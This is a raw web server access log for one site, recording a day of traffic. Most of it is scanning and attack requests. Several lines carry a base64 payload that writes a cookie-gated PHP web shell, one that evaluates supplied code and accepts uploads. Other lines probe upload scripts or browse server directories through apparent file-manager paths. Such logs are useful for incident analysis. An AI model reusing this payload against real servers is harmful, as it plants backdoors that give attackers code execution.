216.73.216.189 - - [01/Dec/2025:18:19:33 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fpublic_html%2F29b99 HTTP/1.1" 200 1027 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:19:33 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fpublic_html%2Fassets HTTP/1.1" 200 861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
194.68.32.135 - - [01/Dec/2025:18:20:29 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [01/Dec/2025:18:20:29 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
216.73.216.189 - - [01/Dec/2025:18:20:34 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fpublic_html HTTP/1.1" 200 1275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:20:33 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fpublic_html%2F19055 HTTP/1.1" 200 1589 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
194.68.32.135 - - [01/Dec/2025:18:20:40 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [01/Dec/2025:18:20:40 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [01/Dec/2025:18:20:41 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /29b99/?path=%2F HTTP/1.1" 200 1274 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /straf HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /straf/ HTTP/1.1" 200 535 "http://www.galavista.com/straf" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /35b2e HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:57 +0000] "GET /29b99/?path=%2Fhome%2Fi442524 HTTP/1.1" 200 1839 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:57 +0000] "GET /7709b/?path=%2Fhome%2Fi442524 HTTP/1.1" 200 1802 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:57 +0000] "GET /d4fae/?path=%2Fhome HTTP/1.1" 200 1406 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:54 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fpublic_html%2F19055%2F. HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:55 +0000] "GET /7709b/?path=%2F HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /7709b/?path=%2Fhome HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /29b99/?path=%2Fhome HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.186.131.59 - - [01/Dec/2025:17:52:21 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2862.89 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:17:52:21 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2862.89 Safari/537.36"
45.145.118.189 - - [01/Dec/2025:17:59:09 +0000] "GET / HTTP/1.0" 200 1496 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36/Nutch-1.21-SNAPSHOT"
198.186.131.59 - - [01/Dec/2025:18:11:19 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
106.119.167.146 - - [01/Dec/2025:18:11:59 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.73.216.189 - - [01/Dec/2025:18:23:55 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fpublic_html HTTP/1.1" 200 1315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:55 +0000] "GET /_autoindex/assets/icons/corner-left-up.svg HTTP/1.1" 200 328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:55 +0000] "GET /assets HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:55 +0000] "GET /assets/ HTTP/1.1" 200 603 "http://www.galavista.com/assets" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /a839d HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:54 +0000] "GET /dfb27f996d.php?path=%2Fhome HTTP/1.1" 200 822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /a839d/ HTTP/1.1" 200 10868 "http://www.galavista.com/a839d" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:18:29:16 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0"
216.73.216.189 - - [01/Dec/2025:18:20:34 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fpublic_html%2F.well-known HTTP/1.1" 200 870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
194.68.32.135 - - [01/Dec/2025:18:20:40 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /1d2be/error_log HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /dfb27f996d.php?path=%2F HTTP/1.1" 200 1274 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /19055/?path=%2Fhome HTTP/1.1" 200 1406 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /19055/?path=%2Fhome%2Fi442524 HTTP/1.1" 200 2465 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:24:39 +0000] "GET /_autoindex/assets/js/tablesort.number.js HTTP/1.1" 200 322 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:24:39 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524 HTTP/1.1" 200 1839 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:18:29:21 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0"
192.121.16.196 - - [01/Dec/2025:18:29:21 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0"
43.128.156.124 - - [01/Dec/2025:18:34:53 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.129.247 - - [01/Dec/2025:18:36:10 +0000] "GET /19055/?path=/home/i442524/.bash_logout HTTP/1.1" 200 1092 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.186.131.59 - - [01/Dec/2025:18:39:12 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.71 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:18:23:56 +0000] "GET /35b2e/ HTTP/1.1" 200 12422 "http://www.galavista.com/35b2e" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:24:27 +0000] "GET /d4fae/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fd4fae%2F. HTTP/1.1" 200 1538 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:24:27 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fpublic_html%2F19055%2Fpostnews.php HTTP/1.1" 200 3180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
43.135.144.81 - - [01/Dec/2025:18:26:09 +0000] "GET /d4fae/?path=/home HTTP/1.1" 200 1647 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [01/Dec/2025:18:29:20 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [01/Dec/2025:18:48:28 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2935.28 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:18:48:29 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2935.28 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:18:56:00 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.112.223.135 - - [01/Dec/2025:18:58:01 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2783.99 Safari/537.36"
37.112.223.135 - - [01/Dec/2025:18:58:01 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2783.99 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:18:59:06 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fpublic_html%2Fce685 HTTP/1.1" 200 887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:59:06 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fpublic_html%2Fstraf HTTP/1.1" 200 696 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.186.131.59 - - [01/Dec/2025:18:39:16 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.71 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:18:39:18 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.71 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:18:39:18 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.71 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:18:48:29 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2935.28 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:18:48:29 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2935.28 Safari/537.36"
43.159.128.247 - - [01/Dec/2025:18:56:16 +0000] "GET /straf/?SA HTTP/1.1" 200 673 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
